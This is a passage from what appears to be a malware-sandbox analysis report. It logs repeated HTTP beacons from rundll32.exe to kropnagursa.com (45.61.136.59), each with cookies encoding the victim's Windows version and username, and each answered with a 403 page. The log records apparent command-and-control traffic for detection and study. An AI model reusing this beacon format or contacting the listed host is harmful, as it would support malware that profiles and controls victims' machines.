                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            239192.168.2.44993545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:22.657219887 CET2413OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:22.828241110 CET2414INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:22 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            24192.168.2.44972045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:13.801273108 CET2138OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:13.966052055 CET2138INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:13 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            240192.168.2.44993645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:23.487126112 CET2415OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:23.653186083 CET2415INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:23 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            241192.168.2.44993745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:23.960062981 CET2416OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:24.125262976 CET2416INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:24 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            242192.168.2.44993845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:24.458988905 CET2417OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:24.627202034 CET2418INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:24 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            243192.168.2.44993945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:25.017015934 CET2418OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:25.181904078 CET2419INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:25 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            244192.168.2.44994045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:25.486398935 CET2420OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:25.651338100 CET2420INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:25 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            245192.168.2.44994145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:25.963960886 CET2421OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:26.129509926 CET2421INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:26 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            246192.168.2.44994245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:26.458576918 CET2422OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:26.623122931 CET2423INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:26 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            247192.168.2.44994345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:26.932137012 CET2423OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:27.096647024 CET2424INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:27 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            248192.168.2.44994445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:27.419188023 CET2425OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:27.584728003 CET2425INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:27 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            249192.168.2.44994545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:27.897190094 CET2426OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:28.061945915 CET2426INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:27 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            25192.168.2.44972145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:14.575592041 CET2139OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:14.743505001 CET2140INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:14 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            250192.168.2.44994645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:28.390183926 CET2427OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:28.566128969 CET2428INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:28 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            251192.168.2.44994745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:29.470002890 CET2429OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:29.634846926 CET2429INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:29 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            252192.168.2.44994845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:30.156330109 CET2430OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
